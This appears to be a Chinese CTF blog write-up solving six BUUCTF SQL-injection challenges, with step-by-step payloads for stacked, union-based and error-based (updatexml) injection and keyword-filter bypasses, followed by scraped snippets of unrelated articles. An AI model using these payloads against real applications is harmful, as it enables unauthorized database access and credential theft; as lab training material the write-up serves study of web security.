poggioxay
poggioxay

BUUCTF web SQL注入篇

文章目录

  • [极客大挑战 2019]EasySQL
  • [强网杯 2019]随便注
  • [SUCTF 2019]EasySQL
  • [极客大挑战 2019]LoveSQL
  • [极客大挑战 2019]BabySQL
  • [极客大挑战 2019]HardSQL

[极客大挑战 2019]EasySQL

BUUCTF web SQL注入篇_第1张图片
根据题目,可以使用万能密码来尝试登陆。
BUUCTF web SQL注入篇_第2张图片
在这里插入图片描述
BUUCTF web SQL注入篇_第3张图片

[强网杯 2019]随便注

BUUCTF web SQL注入篇_第4张图片

  1. 根据题目,可以想到此题目为sql注入,提交1与1’的结果如下BUUCTF web SQL注入篇_第5张图片
    BUUCTF web SQL注入篇_第6张图片
    说明闭合方式为1’
  2. 使用1’ order by 查询字段数,得出为两列BUUCTF web SQL注入篇_第7张图片
    BUUCTF web SQL注入篇_第8张图片
    使用联合注入,发现select被过滤,常用的注入方式无法满足,尝试堆叠注入。
1'; show tables;#     
0'; show tables;#      //获得两个表名

BUUCTF web SQL注入篇_第9张图片

BUUCTF web SQL注入篇_第10张图片
4.

0'; show columns from `words`;#

0'; show columns from `1919810931114514`;#     
//注意表明左右两侧应用键盘左上角的`符号,不可以用单引号

BUUCTF web SQL注入篇_第11张图片
BUUCTF web SQL注入篇_第12张图片
5. 经观察,flag1919810931114514表中,可以看到words表里有两个属性,即两列:iddata。而1919810931114514表里只有一个属性列说明输入框可能查询的就是words表。思路是把1919810931114514表改名为words表,把属性名flag改为id,然后用1’ or 1=1;# 显示flag出来

1';rename table `words` to words2;     //先把words表表明换成其他
1';rename table `1919810931114514` to `words`;#
1'; alter table words change flag id varchar(100);#
1'; show tables;# 
1'; show columns from words;#

BUUCTF web SQL注入篇_第13张图片
varchar函数返回字符串、日期型、图形串的可变长度的字符串表示。 eg: select varchar (name,50) from test --50为截取长度,如果name字符串的长度大于50,则返回“SQL0445W 值已被截断。

[SUCTF 2019]EasySQL

  1. 与上一关相同的思路,输入1和2查看回显均相同,而字母没有回显。BUUCTF web SQL注入篇_第14张图片
    BUUCTF web SQL注入篇_第15张图片
  2. 输入1’,没有回显,说明存在sql注入,即不考虑报错注入的方法
  3. 使用order by查询字段,发现不论order by后面输入几显示都一样,则可能过滤了order by 字段。
    BUUCTF web SQL注入篇_第16张图片
  4. 排除了报错注入和来联合查询注入,我们可以尝试布尔注入,发现回显结果依旧如上。
1 and length(database())>=1#

1' and length(database())>=1#

BUUCTF web SQL注入篇_第17张图片
BUUCTF web SQL注入篇_第18张图片
5. 我们继续尝试时间盲注

1 and if(length(database())>=1,1,sleep(5))#

1' and if(length(database())>=1,1,sleep(5))#

BUUCTF web SQL注入篇_第19张图片
BUUCTF web SQL注入篇_第20张图片
发现回显依然相同。
6. 我们继续尝试堆叠注入

1;show databases#

在这里插入图片描述

1;show tables#

BUUCTF web SQL注入篇_第21张图片

1;show columns from Flag#

BUUCTF web SQL注入篇_第22张图片
7. 这时候我们要重新考虑前面的步骤,这道题目需要我们去对后端语句进行猜测
一、输入非零数字得到的回显1和输入其余字符得不到回显=>来判断出内部的查询语句可能存在有||
二、也就是select 输入的数据||内置的一个列名 from 表名=>即为

select post进去的数据||flag from Flag(含有数据的表名,通过堆叠注入可知)

此时的||起到的作用是or的作用。
8. 内置的sql语句为

sql=“select”.post[‘query’]."||flag from Flag";

如果$post[‘query’]的数据为* ,1,sql语句就变成了

select *,1||flag from Flag

select *,1 from Flag

BUUCTF web SQL注入篇_第23张图片
*,1 后面的这个1就是为了吃掉||但是得非0数字(比如2.3.4.5.6),输入字母它是不会识别的。

[极客大挑战 2019]LoveSQL

首先判断为单引号闭合BUUCTF web SQL注入篇_第24张图片
尝试万能密码,登录成功,结果尝试不是正确的flag
BUUCTF web SQL注入篇_第25张图片
我们重新从order by查询字段开始

?username=admin'  order by 3# &password=admin

BUUCTF web SQL注入篇_第26张图片
查看url处,发现字符被url编码,我们可以尝试将注释符#进行url编码,得到字段数为3BUUCTF web SQL注入篇_第27张图片

BUUCTF web SQL注入篇_第28张图片

?username=-1' union select 1,2,3%23 &password=admin

BUUCTF web SQL注入篇_第29张图片
联合查询获得数据库

?username=-1' union select 1,2,database()%23 &password=admin

BUUCTF web SQL注入篇_第30张图片
获得表名

?username=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek'%23 &password=admin

BUUCTF web SQL注入篇_第31张图片
查看l0ve1ysq1表中的字段

?username=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'%23 &password=admin

BUUCTF web SQL注入篇_第32张图片
查看geekuser表中的字段

?username=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='geekuser'%23 &password=admin

BUUCTF web SQL注入篇_第33张图片
查看geekuser字段中的password的值

?username=-1' union select 1,2,group_concat(password) from geek.geekuser%23 &password=admin

BUUCTF web SQL注入篇_第34张图片
查看l0ve1ysq1字段中的password的值,得到flag

?username=-1' union select 1,2,group_concat(password) from geek.l0ve1ysq1%23 &password=admin

BUUCTF web SQL注入篇_第35张图片

[极客大挑战 2019]BabySQL

BUUCTF web SQL注入篇_第36张图片
又是前面熟悉的SQL注入的题目的背景图
首先尝试万能密码登录,发现数据使用为get方式传参,提示用户名密码错误。BUUCTF web SQL注入篇_第37张图片BUUCTF web SQL注入篇_第38张图片
经过测试字符串的闭合方式为单引号BUUCTF web SQL注入篇_第39张图片
尝试将密码注释掉,登录成功。

?username=admin' --+&password=1

BUUCTF web SQL注入篇_第40张图片
查看报错信息,发现or被过滤

?username=admin' order by 3--+&password=1

BUUCTF web SQL注入篇_第41张图片
尝试双写关键字绕过

?username=admin' oorrder by 2--+ &password=1

BUUCTF web SQL注入篇_第42张图片
但是使用万能密码却可以登录成功

?username=admin' oorr  '1'='1--+ &password=1

BUUCTF web SQL注入篇_第43张图片
继续尝试联合注入的语句,发现union select均被过滤

?username=admin' union select 1,2,3,4--+ &password=1

BUUCTF web SQL注入篇_第44张图片
继续尝试双写关键字绕过,得到字段数为3

?username=admin' uniunionon seleselectct 1,2,3--+ &password=1

BUUCTF web SQL注入篇_第45张图片
接着查看联合注入的回显位置

?username=1' uniunionon seleselectct 11,22,33--+ &password=1

BUUCTF web SQL注入篇_第46张图片
继续查看数据库为geek

?username=1' uniunionon seleselectct 11,22,database()--+ &password=1

BUUCTF web SQL注入篇_第47张图片
继续查看表名,发现where、from、or被过滤,均使用双写关键字绕过。得到表名为b4bsql,geekuser

?username=1' uniunionon selselectect 11,22,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='geek'--+ &password=1

BUUCTF web SQL注入篇_第48张图片
爆出表b4bsql中的字段名

?username=1' uniunionon selselectect 11,22,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql'--+&password=1

BUUCTF web SQL注入篇_第49张图片
爆出字段b4bsql字段中paaaword的值,得到flag。

?username=1' uniunionon selselectect 11,22,group_concat(passwoorrd) frfromom geek.b4bsql--+&password=1

BUUCTF web SQL注入篇_第50张图片

[极客大挑战 2019]HardSQL

BUUCTF web SQL注入篇_第51张图片

  1. 随便输入一个用户名和密码,查看url,发现为get传参方式。BUUCTF web SQL注入篇_第52张图片
check.php?username=aaa&password=aaa'

尝试单引号发现出现报错,查看报错提示,猜测闭合方式为单引号
3. 经过测试,空格和注释符号均被注释,注释用%23进行绕过,而将空格使用()来绕过。使用联合注入不太行,尝试报错注入。在用户名或密码处进行注入均可。
4. 爆库名

check.php?username=admin&password=aaa'or(updatexml(1,concat(0x7e,database()),1))%23

check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,database()))%23

BUUCTF web SQL注入篇_第53张图片

admin'or(updatexml(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table_schema)like('geek')),0x7e),1))%23

BUUCTF web SQL注入篇_第54张图片

admin'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))%23

BUUCTF web SQL注入篇_第55张图片

admin'or(updatexml(1,concat(0x7e,(select(group_concat(id,'~',username,'~',password))from(H4rDsq1)),0x7e),1))%23

BUUCTF web SQL注入篇_第56张图片

  1. 空格被过滤可以使用/**/或者()绕过
  2. =号被过滤可以用like来绕过
  3. substringmid被过滤可以用rightleft来绕过

右边的flag

admin'or(updatexml(1,concat(0x7e,(select(right(password,25))from(H4rDsq1)),0x7e),1))%23

BUUCTF web SQL注入篇_第57张图片

将两次得到的flag进行拼接即可。

你可能感兴趣的:(CTF,SQL注入)

  • Java Web安全与Spring Config对象实战 福建低调
    本文还有配套的精品资源,点击获取简介:本课程深入探讨JavaWeb开发中的安全实践,包括认证与授权、输入验证、CSRF和XSS防护以及SQL注入防御等关键安全措施。同时,介绍SpringSecurity框架的应用,以及Config对象在Spring配置管理中的作用,包括依赖注入和外部化配置。课程还包括实战演练,通过设置安全环境和安全漏洞模拟,帮助开发者提升应用的安全性和故障排查能力。1.Web安全
  • 软考——简单记忆设计模式 Yeira 设计模式pythonjava
    抽象工厂模式(AbstractFactory):提供一个接口,可以创建一系列相关或相互依赖的对象,而无需指定它们具体的类。(一个接口创建相关对象,无需具体的类)构建器模式(Builder):将一个复杂类的表示与其构造相分离,使得相同的构建过程能够得出不同的表示。(相同是构造,不同的表示)工厂方法模式(FactoryMethod):定义一个创建对象的接口,但由子类决定需要实例化哪一个类。工厂方法使得
  • 【软考】设计模式之抽象工厂模式 王佑辉 软考设计模式软考
    目录1.说明2.应用场景3.结构图4.构成5.适用性6.优点7.缺点8.java示例1.说明1.提供一个创建一系列相关或相互依赖对象的接口,而无须指定它们具体的类。2.抽象工厂模式(AbstractFactoryPattern)是一种创建型设计模式。3.抽象工厂模式用于系统的产品族,而不仅仅是一个等级结构;一个等级的抽象类只能创建一个等级的产品,而抽象工厂模式能创建多个等级的产品。2.应用场景1.
  • XSS和sql注入部分场景测试用例样例 谷隐凡二 测试xsssql测试用例
    目录1.SQL注入测试用例设计基本SQL注入复杂SQL注入盲注测试2.XSS攻击测试用例设计基本XSS攻击复杂XSS攻击DOM-basedXSS1.SQL注入测试用例设计SQL注入攻击通常通过在输入字段中插入恶意SQL代码,试图操纵数据库查询。设计这些测试用例时,需要涵盖各种常见的SQL注入技术。基本SQL注入用例1:使用单引号:输入:'OR'1'='1预期结果:应拒绝输入并返回错误消息,不应允许
  • 30、基于SelectFromModel和LassoCV的特征选择 凌晨思索
    30、基于SelectFromModel和LassoCV的特征选择importmatplotlib.pyplotaspltimportnumpyasnpfromsklearn.datasetsimportload_diabetesfromsklearn.feature_selectionimportSelectFromModelfromsklearn.linear_modelimportLasso
  • 【鸿蒙HarmonyOS开发笔记】使用@Preview装饰器预览组件 Luxine. 鸿蒙HarmonyOS开发笔记前端分享笔记华为harmonyos
    概述ArkTS应用/服务支持组件预览,要求compileSdkVersion为8或以上。组件预览支持实时预览,不支持动态图和动态预览。组件预览通过在组件前添加注解@Preview实现,在单个源文件中,最多可以使用10个@Preview装饰自定义组件。@Preview的使用参考如下示例@Preview({title:'FoodImage'})@ComponentstructFoodImageDisp
  • vue3+tesseract 图片文字提取 妙明元心 javascriptvue.jsecmascript
    github:https://github.com/naptha/tesseract.js可实现多语言识别,中英文混合识别demo如下:importTesseractfrom"tesseract.js"//方式1:Tesseract.recognize('http://localhost:5173/vue.jpg','eng+chi_sim',).then((d)=>{console.log(d.
  • iOS M1芯片Mac上Xcode模拟器报错解决 aven_kang
    真机编译可以通过,模拟器失败,出现以下错误...,buildingforiOSSimulator,butlinkinginobjectfilebuiltforiOS,file'...'或者couldnotfindmodulefortarget'x86_64-apple-ios-simulator'解决方案一1.添加arm64到项目PEROJECT和TARGETS的ExcludedArchitect
  • Java代码审计篇:SQL注入 zkzq 数据库
    一、常见SQL注入1、sql语句动态拼接示例代码:Stringid=request.getParameter("id");res=st.executeQuery("SELECT*FROM\"IWEBSEC\".\"user\"WHERE\"id\"="+id);while(res.next()){intp=res.getInt("id");Stringn=res.getString("userna
  • 深入解析:23种软件设计模式详解及其分类(创建型、结构型、行为型)附代码示例DEMO J^T 设计模式C/C++设计模式装饰器模式组合模式观察者模式单例模式23种设计模式
    目录引言一、创建型模式1.简单工厂模式(SimpleFactoryPattern)2.抽象工厂模式(AbstractFactoryPattern)3.单例模式(SingletonPattern)4.建造者模式(BuilderPattern)5.原型模式(PrototypePattern)二、结构型模式1.适配器模式(AdapterPattern)2.桥接模式(BridgePattern)3.装饰器
  • OSError: libnccl.so.2: cannot open shared object file: No such file or directory 王小葱鸭 python
    linux安装完torch或者tensorflow的gpu版本,安装没问题,但是import就有问题,报错OSError:libnccl.so.2:cannotopensharedobjectfile:Nosuchfileordirectory,是缺少nvidia的ncll,下面介绍解决方法:1安装ncll下载链接https://developer.nvidia.com/nccl/nccl-dow
  • SWPUCTF 2022 新生赛 Does your nc work? Darklight夜曦 网络安全
    首先打开环境,发现并没有附件,那我们直接进行nc连接看一下发现直接问我们问我们问题,让我们输入答案,直接ls查看目录,找flag最可能在的位置,然后运用cd和cat指令,搜查出flag的位置,找到了flagflag=NSSCTF{669c30b6-9b2d-437f-bef7-a8f06672f3c3}
  • 分析React fiber weixin_34367845 javascript数据结构与算法ViewUI
    Reactfiber是最新react用的算法选择,其大概的介绍点击这里;现在的局限在现有React中,更新过程中是同步的(这个js代码的代码执行相关)同步的递归的渲染和调和fiber目的中断进程,后面还可以回到进程(work)中;为各个进程(work)分优先级;可以再次使用之前完成的进程(work);终止后面不再使用的进程(work);Inordertodoanyofthis,wefirstnee
  • React 中的 Fiber 架构 hawk2014bj react.js架构前端
    ReactFiber介绍ReactFiber是React的一种重写和改进的核心算法,用于实现更细粒度的更新和高效的调度。它是React16版本中的一个重要更新,使得React能够更好地处理复杂和高频的用户交互。以下是对ReactFiber的详细介绍:为什么需要ReactFiber?在传统的React中,更新操作是同步的,一旦开始更新,整个组件树的更新过程不会被中断。这在处理复杂组件树或高频用户交互
  • 【web | CTF】攻防世界 Web_php_unserialize 星盾网安 CTF-Webphp开发语言
    天命:这条反序列化题目也是比较特别,里面的漏洞知识点,在现在的php都被修复了天命:而且这次反序列化的字符串数量跟其他题目不一样file=$file;}//销毁时候触发,相当于是打印flag文件出来function__destruct(){echo@highlight_file($this->file,true);}//这个方法不会触发,估计是旧版本的php,满足某些情况所以没有触发//纯碎用来吓
  • 【网络安全 | CTF】攻防世界 Web_php_unserialize 解题详析 秋说 CTFCTF网络安全web安全
    文章目录代码审计解题思路wakeup绕过preg_match绕过base64绕过GET传参方法二代码审计这段代码首先定义了一个名为Demo的类,包含了一个私有变量$file和三个魔术方法__construct()、__destruct()和__wakeup()。其中:__construce()方法用于初始化$file变量__destruce方法用于输出文件内容__wakeup()方法检查当前对象的
  • Mybatis 防止sql注入 Ferrari1001
    SQL****注入是一种代码注入技术,用于攻击数据驱动的应用,恶意的****SQL****语句被插入到执行的实体字段中(例如,为了转储数据库内容给攻击者)。[摘自]SQLinjection-WikipediaSQL****注入,大家都不陌生,是一种常见的攻击方式。攻击者在界面的表单信息或URL上输入一些奇怪的SQL片段(例如“or‘1’=’1’”这样的语句),有可能入侵参数检验不足的应用程序。所以
  • sql注入常用函数 web安全工具库 小课堂sql注入常用函数
    当所有情绪都堆在一起的时候,才发现自己已经不是那个一块糖就能开心的小孩子了。。。----网易云热评一、MySql注入常用函数1、system_user()系统用户名2、user()用户名3、current_user()当前用户名4、session_user()链接数据库的用户名5、database()数据库名6、version()数据库版本7、@@datadir数据库路径8、@@basedir数据
  • github源码指引:共享内存、数据结构与算法:树形结构ListTree 初级代码游戏 github源码指引共享内存数据结构与算法github共享内存链表
    初级代码游戏的专栏介绍与文章目录-CSDN博客我的github:codetoys,所有代码都将会位于ctfc库中。已经放入库中我会指出在库中的位置。这些代码大部分以Linux为目标但部分代码是纯C++的,可以在任何平台上使用。专题:共享内存、数据结构与算法_初级代码游戏的博客-CSDN博客本文讲解带有子项的链表。一、介绍与上一篇介绍的单向链表相比,多了一个子项指针。可以理解为原来的链表是兄弟关系,
  • python自动化笔记:操作mysql数据库 zhoukeguai python自动化笔记数据库python自动化
    操作mysql数据库常见方法1、第三方库:pymysql1.1、安装pymysql1.2、连接数据库1.3、连接指定数据库1.4创建数据库、创建表1.5、表中插入数据1.6、批量插入数据1.7、获取查询结果数据1.8、防sql注入,sql语句中一般用占位符传值2、标准库:mysql.connector2.1、安装mysql-connector2.2、操作方法1、第三方库:pymysql1.1、安装
  • Node.js 入门:中间件与安全性深度解析 Switch616 前端node.js中间件chrome服务器架构前端前端框架
    Node.js入门:中间件与安全性深度解析目录认证与授权使用jsonwebtoken实现JWT身份验证用户注册与登录:认证流程与实践️权限管理:安全访问控制详解️安全性防止SQL注入:参数化查询与ORM的最佳实践防止XSS攻击:用户输入处理与安全防护使用HTTPS和SSL/TLS:加密传输与数据安全⚠️错误处理️全局错误处理:确保应用稳定性的关键异常捕获与日志记录:有效排查问题的核心认证与授权使用
  • springcloud-Finchley.SR1 霹雳解锋镝
    主依赖com.lhmypinyougou1.0-SNAPSHOTjarmypinyougouDemoprojectforSpringBootmanager-uimanager-serverpinyougou-commoneureka-serverorg.springframework.bootspring-boot-starter-parent2.0.5.RELEASEUTF-8UTF-81.8o
  • SQL注入漏洞检测 Kali与编程~ sql网络安全
    预计更新SQL注入概述1.1SQL注入攻击概述1.2SQL注入漏洞分类1.3SQL注入攻击的危害SQLMap介绍2.1SQLMap简介2.2SQLMap安装与配置2.3SQLMap基本用法SQLMap进阶使用3.1SQLMap高级用法3.2SQLMap配置文件详解3.3SQLMap插件的使用SQL注入漏洞检测4.1SQL注入漏洞检测基础4.2SQL注入漏洞检测工具4.3SQL注入漏洞检测实战SQL
  • 深度解析react中hooks的底层原理是啥?React架构fiber原理深度解析 为了WLB努力 react.js
    1.ReactHooks底层原理ReactHooks的底层原理是基于ReactFiber架构的实现。下面是对ReactHooks底层原理的深度解析:Fiber架构:ReactFiber是React的新的协调引擎,它的设计目标是支持增量式更新、优先级调度、暂停和继续执行等特性。Fiber架构重新实现了React的调度算法,使得React可以更灵活地控制组件的渲染过程。我们都知道react框架的核心算
  • sql注入漏洞 mineflame_ sql
    所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行指定的SQL语句。主要原因是程序员在开发用户和数据库交互的系统时没有对用户输入的字符串进行过滤,转义,限制或处理不严谨,导致用户可以通过输入精心构造的字符串去非法获取到数据库中的数据。具体来说,它是利用现有应用程序,将SQL语句注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入
  • Oracle undo表空间爆满的解决 小学生汤米 ORACLEORACLEundo空间满
    1.查找数据库的UNDO表空间名,确定当前例程正在使用的UNDO表空间:Showparameterundo_tablespace。2.检查数据库UNDO表空间占用空间情况以及数据文件存放位置;selectfile_name,bytes/1024/1024/1024fromdba_data_fileswheretablespace_namelike'UNDOTBS%';3.查看回滚段的使用情况,哪个
  • Oracle(107)什么是数据库防火墙(Database Firewall)? 辞暮尔尔-烟火年年 Oracle数据库oracle
    数据库防火墙(DatabaseFirewall)是一种安全技术,用于监控和控制对数据库的访问,以防止未经授权的访问、SQL注入攻击和其他恶意活动。数据库防火墙可以实时分析和过滤SQL查询,确保只有合法的、预期的查询能够到达数据库,从而保护数据库的完整性和安全性。数据库防火墙的主要功能SQL语句分析和过滤:实时分析传入的SQL语句,阻止恶意或未经授权的SQL语句。行为基准:建立正常SQL语句的基准,
  • mysql中insert into select from的使用 SHENHUANJIE 数据库
    mysql中insertintoselectfrom的使用如何在MySQL从多个表中组合字段然后插入到一个新表中,通过一条sql语句实现。具体情形是:有三张表a、b、c,现在需要从表b和表c中分别查几个字段的值插入到表a中对应的字段。对于这种情况,我们可以使用如下的语句来实现:INSERTINTOdb1_name(field1,field2)SELECTfield1,field2FROMdb2_n
  • java sql注入正则表达式_Java程序员从笨鸟到菜鸟之(一百零二)sql注入攻击详解(三)sql注入解决办法... 用看智障的眼神看 javasql注入正则表达式
    我们了解了sql注入原理和sql注入过程,今天我们就来了解一下sql注入的解决办法。怎么来解决和防范sql注入,由于本人主要是搞javaweb开发的小程序员,所以这里我只讲一下有关于javaweb的防止办法。其实对于其他的,思路基本相似。下面我们先从web应用程序的角度来看一下如何避免sql注入:1、普通用户与系统管理员用户的权限要有严格的区分。如果一个普通用户在使用查询语句中嵌入另一个DropT
  • php操作mysql防止sql注入(合集) get200 mysqlmysql注入
    本文将从sql注入风险说起,并且比较addslashes、mysql_escape_string、mysql_real_escape_string、mysqli和pdo的预处理的区别。当一个变量从表单传入到php,需要查询mysql的话,需要进行处理。举例:$unsafe_variable=$_POST[‘user_input’];mysqli_query(“INSERTINTOtable(col
  • ASM系列四 利用Method 组件动态注入方法逻辑 lijingyao8206 字节码技术jvmAOP动态代理ASM
            这篇继续结合例子来深入了解下Method组件动态变更方法字节码的实现。通过前面一篇,知道ClassVisitor 的visitMethod()方法可以返回一个MethodVisitor的实例。那么我们也基本可以知道,同ClassVisitor改变类成员一样,MethodVIsistor如果需要改变方法成员,注入逻辑,也可以
  • java编程思想 --内部类 百合不是茶 java内部类匿名内部类
    内部类;了解外部类 并能与之通信 内部类写出来的代码更加整洁与优雅   1,内部类的创建  内部类是创建在类中的 package com.wj.InsideClass; /* * 内部类的创建 */ public class CreateInsideClass { public CreateInsideClass(
  • web.xml报错 crabdave web.xml
    web.xml报错   The content of element type "web-app" must match "(icon?,display-  name?,description?,distributable?,context-param*,filter*,filter-mapping*,listener*,servlet*,s
  • 泛型类的自定义 麦田的设计者 javaandroid泛型
       为什么要定义泛型类,当类中要操作的引用数据类型不确定的时候。 采用泛型类,完成扩展。   例如有一个学生类     Student{ Student(){ System.out.println("I'm a student....."); } }  有一个老师类  
  • CSS清除浮动的4中方法 IT独行者 JavaScriptUIcss
    清除浮动这个问题,做前端的应该再熟悉不过了,咱是个新人,所以还是记个笔记,做个积累,努力学习向大神靠近。CSS清除浮动的方法网上一搜,大概有N多种,用过几种,说下个人感受。 1、结尾处加空div标签 clear:both 1 2 3 4 .div 1 { background : #000080 ; border : 1px   s
  • Cygwin使用windows的jdk 配置方法 _wy_ jdkwindowscygwin
    1.[vim /etc/profile]    JAVA_HOME="/cgydrive/d/Java/jdk1.6.0_43"  (windows下jdk路径为D:\Java\jdk1.6.0_43)    PATH="$JAVA_HOME/bin:${PATH}"    CLAS
  • linux下安装maven 无量 mavenlinux安装
    Linux下安装maven(转) 1.首先到Maven官网 下载安装文件,目前最新版本为3.0.3,下载文件为 apache-maven-3.0.3-bin.tar.gz,下载可以使用wget命令; 2.进入下载文件夹,找到下载的文件,运行如下命令解压 tar -xvf  apache-maven-2.2.1-bin.tar.gz 解压后的文件夹
  • tomcat的https 配置,syslog-ng配置 aichenglong tomcathttp跳转到httpssyslong-ng配置syslog配置
    1) tomcat配置https,以及http自动跳转到https的配置     1)TOMCAT_HOME目录下生成密钥(keytool是jdk中的命令)      keytool -genkey -alias tomcat -keyalg RSA -keypass changeit -storepass changeit
  • 关于领号活动总结 alafqq 活动
    关于某彩票活动的总结 具体需求,每个用户进活动页面,领取一个号码,1000中的一个; 活动要求 1,随机性,一定要有随机性; 2,最少中奖概率,如果注数为3200注,则最多中4注 3,效率问题,(不能每个人来都产生一个随机数,这样效率不高); 4,支持断电(仍然从下一个开始),重启服务;(存数据库有点大材小用,因此不能存放在数据库) 解决方案 1,事先产生随机数1000个,并打
  • java数据结构 冒泡排序的遍历与排序 百合不是茶 java
    java的冒泡排序是一种简单的排序规则   冒泡排序的原理:           比较两个相邻的数,首先将最大的排在第一个,第二次比较第二个 ,此后一样;         针对所有的元素重复以上的步骤,除了最后一个     例题;将int array[]
  • JS检查输入框输入的是否是数字的一种校验方法 bijian1013 js
    如下是JS检查输入框输入的是否是数字的一种校验方法: <form method=post target="_blank"> 数字:<input type="text" name=num onkeypress="checkNum(this.form)"><br> </form>
  • Test注解的两个属性:expected和timeout bijian1013 javaJUnitexpectedtimeout
    JUnit4:Test文档中的解释:   The Test annotation supports two optional parameters.   The first, expected, declares that a test method should throw an exception.   If it doesn't throw an exception or if it
  • [Gson二]继承关系的POJO的反序列化 bit1129 POJO
    父类     package inheritance.test2; import java.util.Map; public class Model { private String field1; private String field2; private Map<String, String> infoMap
  • 【Spark八十四】Spark零碎知识点记录 bit1129 spark
    1. ShuffleMapTask的shuffle数据在什么地方记录到MapOutputTracker中的 ShuffleMapTask的runTask方法负责写数据到shuffle map文件中。当任务执行完成成功,DAGScheduler会收到通知,在DAGScheduler的handleTaskCompletion方法中完成记录到MapOutputTracker中  
  • WAS各种脚本作用大全 ronin47 WAS 脚本
       http://www.ibm.com/developerworks/cn/websphere/library/samples/SampleScripts.html    无意中,在WAS官网上发现的各种脚本作用,感觉很有作用,先与各位分享一下     获取下载 这些示例 jacl 和 Jython 脚本可用于在 WebSphere Application Server 的不同版本中自
  • java-12.求 1+2+3+..n不能使用乘除法、 for 、 while 、 if 、 else 、 switch 、 case 等关键字以及条件判断语句 bylijinnan switch
    借鉴网上的思路,用java实现: public class NoIfWhile { /** * @param args * * find x=1+2+3+....n */ public static void main(String[] args) { int n=10; int re=find(n); System.o
  • Netty源码学习-ObjectEncoder和ObjectDecoder bylijinnan javanetty
    Netty中传递对象的思路很直观: Netty中数据的传递是基于ChannelBuffer(也就是byte[]); 那把对象序列化为字节流,就可以在Netty中传递对象了 相应的从ChannelBuffer恢复对象,就是反序列化的过程 Netty已经封装好ObjectEncoder和ObjectDecoder 先看ObjectEncoder ObjectEncoder是往外发送
  • spring 定时任务中cronExpression表达式含义 chicony cronExpression
    一个cron表达式有6个必选的元素和一个可选的元素,各个元素之间是以空格分隔的,从左至右,这些元素的含义如下表所示: 代表含义            是否必须 允许的取值范围         &nb
  • Nutz配置Jndi ctrain JNDI
    1、使用JNDI获取指定资源: var ioc = { dao : { type :"org.nutz.dao.impl.NutDao", args : [ {jndi :"jdbc/dataSource"} ] } } 以上方法,仅需要在容器中配置好数据源,注入到NutDao即可.
  • 解决 /bin/sh^M: bad interpreter: No such file or directory daizj shell
    在Linux中执行.sh脚本,异常/bin/sh^M: bad interpreter: No such file or directory。   分析:这是不同系统编码格式引起的:在windows系统中编辑的.sh文件可能有不可见字符,所以在Linux系统下执行会报以上异常信息。 解决: 1)在windows下转换: 利用一些编辑器如UltraEdit或EditPlus等工具
  • [转]for 循环为何可恨? dcj3sjt126com 程序员读书
      Java的闭包(Closure)特征最近成为了一个热门话题。 一些精英正在起草一份议案,要在Java将来的版本中加入闭包特征。 然而,提议中的闭包语法以及语言上的这种扩充受到了众多Java程序员的猛烈抨击。 不久前,出版过数十本编程书籍的大作家Elliotte Rusty Harold发表了对Java中闭包的价值的质疑。 尤其是他问道“for 循环为何可恨?”[http://ju
  • Android实用小技巧 dcj3sjt126com android
    1、去掉所有Activity界面的标题栏   修改AndroidManifest.xml   在application 标签中添加android:theme="@android:style/Theme.NoTitleBar"   2、去掉所有Activity界面的TitleBar 和StatusBar    修改AndroidManifes
  • Oracle 复习笔记之序列 eksliang Oracle 序列sequenceOracle sequence
    转载请出自出处:http://eksliang.iteye.com/blog/2098859 1.序列的作用 序列是用于生成唯一、连续序号的对象 一般用序列来充当数据库表的主键值 2.创建序列语法如下:   create sequence s_emp start with 1 --开始值 increment by 1 --増长值 maxval
  • 有“品”的程序员 gongmeitao 工作
    完美程序员的10种品质     完美程序员的每种品质都有一个范围,这个范围取决于具体的问题和背景。没有能解决所有问题的   完美程序员(至少在我们这个星球上),并且对于特定问题,完美程序员应该具有以下品质:   1. 才智非凡- 能够理解问题、能够用清晰可读的代码翻译并表达想法、善于分析并且逻辑思维能力强   (范围:用简单方式解决复杂问题)  
  • 使用KeleyiSQLHelper类进行分页查询 hvt sql.netC#asp.nethovertree
    本文适用于sql server单主键表或者视图进行分页查询,支持多字段排序。KeleyiSQLHelper类的最新代码请到http://hovertree.codeplex.com/SourceControl/latest下载整个解决方案源代码查看。或者直接在线查看类的代码:http://hovertree.codeplex.com/SourceControl/latest#HoverTree.D
  • SVG 教程 (三)圆形,椭圆,直线 天梯梦 svg
    SVG <circle> SVG 圆形 - <circle> <circle> 标签可用来创建一个圆: 下面是SVG代码: <svg xmlns="http://www.w3.org/2000/svg" version="1.1"> <circle cx="100" c
  • 链表栈 luyulong java数据结构
    public class Node { private Object object; private Node next; public Node() { this.next = null; this.object = null; } public Object getObject() { return object; } public
  • 基础数据结构和算法十:2-3 search tree sunwinner Algorithm2-3 search tree
      Binary search tree works well for a wide variety of applications, but they have poor worst-case performance. Now we introduce a type of binary search tree where costs are guaranteed to be loga
  • spring配置定时任务 stunizhengjia springtimer
    最近因工作的需要,用到了spring的定时任务的功能,觉得spring还是很智能化的,只需要配置一下配置文件就可以了,在此记录一下,以便以后用到:     //------------------------定时任务调用的方法------------------------------ /** * 存储过程定时器 */ publi
  • ITeye 8月技术图书有奖试读获奖名单公布 ITeye管理员 活动
    ITeye携手博文视点举办的8月技术图书有奖试读活动已圆满结束,非常感谢广大用户对本次活动的关注与参与。 8月试读活动回顾: http://webmaster.iteye.com/blog/2102830 本次技术图书试读活动的优秀奖获奖名单及相应作品如下(优秀文章有很多,但名额有限,没获奖并不代表不优秀): 《跨终端Web》 gleams:http
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他